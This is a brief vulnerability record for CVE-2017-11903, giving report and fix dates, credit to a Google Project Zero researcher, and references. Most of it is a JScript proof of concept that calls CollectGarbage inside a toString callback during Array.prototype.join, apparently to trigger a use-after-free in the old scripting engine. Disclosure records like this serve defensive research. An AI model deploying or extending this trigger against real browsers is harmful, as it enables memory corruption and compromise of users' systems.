CVE-2017-11903.md

CVE-2017-11903

• Report: Oct 2017
• Fix: Dec 2017
• Credit: ifratric of Google Project Zero

PoC

<script language="Jscript.Encode">

var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};

function f() {
  vars[1] = 1;
  CollectGarbage();
  return {};
}

vars[1].toString = f;
Array.prototype.join.call(vars);

</script>

Reference

• Microsoft
• Google Project Zero